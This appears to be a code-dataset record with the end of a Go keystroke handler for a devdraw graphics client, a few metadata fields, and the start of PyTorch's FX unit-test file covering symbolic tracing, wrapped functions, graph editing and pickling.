// It is called from the graphics thread with no locks held.
func gfx_keystroke(c *Client, ch rune) {
c.eventlk.Lock()
if ch == draw.KeyAlt {
c.kbd.alting = !c.kbd.alting
c.kbd.nk = 0
c.eventlk.Unlock()
return
}
if ch == draw.KeyCmd+'r' {
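// Cmd+r cycles the DPI override: clear an existing override, otherwise force 100 on
// high-DPI displays or 225 on low-DPI ones, then resize the client image.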
if c.forcedpi != 0 {
c.forcedpi = 0
} else if c.displaydpi >= 200 {
c.forcedpi = 100
} else {
c.forcedpi = 225
}
c.eventlk.Unlock()
c.impl.rpc_resizeimg(c)
return
}
if !c.kbd.alting {
kputc(c, ch)
c.eventlk.Unlock()
return
}
if c.kbd.nk >= len(c.kbd.k) { // should not happen
c.kbd.nk = 0
}
c.kbd.k[c.kbd.nk] = ch
c.kbd.nk++
ch = toLatin1(c.kbd.k[:c.kbd.nk])
if ch > 0 {
c.kbd.alting = false
kputc(c, ch)
c.kbd.nk = 0
c.eventlk.Unlock()
return
}
if ch == -1 {
c.kbd.alting = false
for i := 0; i < c.kbd.nk; i++ {
kputc(c, c.kbd.k[i])
}
c.kbd.nk = 0
c.eventlk.Unlock()
return
}
// need more input
c.eventlk.Unlock()
return
}
|
[
"\"DEVDRAWTRACE\""
] |
[] |
[
"DEVDRAWTRACE"
] |
[]
|
["DEVDRAWTRACE"]
|
go
| 1 | 0 | |
test/test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom tracer delegate that treats no modules as leaves, so everything
# gets traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
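# NOTE: `a_lifted_leaf` is a module-level helper (defined earlier in this file and,
# presumably, registered via torch.fx.wrap), so tracing records a `call_function`
# node for it instead of tracing into its body. A minimal sketch of the same
# pattern, with a hypothetical helper name:
#
#     @torch.fx.wrap
#     def my_leaf(pair, b):
#         return pair[0] + pair[1] + b
#
#     def f(x):
#         return my_leaf((x, x), x)
#
#     gm = torch.fx.symbolic_trace(f)   # gm.code calls my_leaf rather than inlining it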
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
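# NOTE: Graph.graph_copy returns the value that fed the copied graph's output node;
# wrapping that Node in a Proxy attaches a graph-appending tracer, so plain Python
# operators keep adding nodes to `new_g` before the final output is emitted.
# Roughly, the pattern is:
#
#     out_val = new_g.graph_copy(old_graph, val_map)   # copy the body, get its output value
#     p = torch.fx.Proxy(out_val)                      # continue building with operators
#     new_g.output((p + p).node)                       # doubles the result, hence gm(3, 4) == 14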
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, f"Unsupported call target {target}"
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in fx_module.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError since its argument can't be a `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
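# NOTE: `autowrap_functions` makes the Tracer record the listed plain-Python
# functions (here `fx_int`, presumably a module-level wrapper around `int`) as
# `call_function` nodes instead of invoking them on Proxy arguments, which is why
# the shape arithmetic above traces without raising a TypeError.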
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
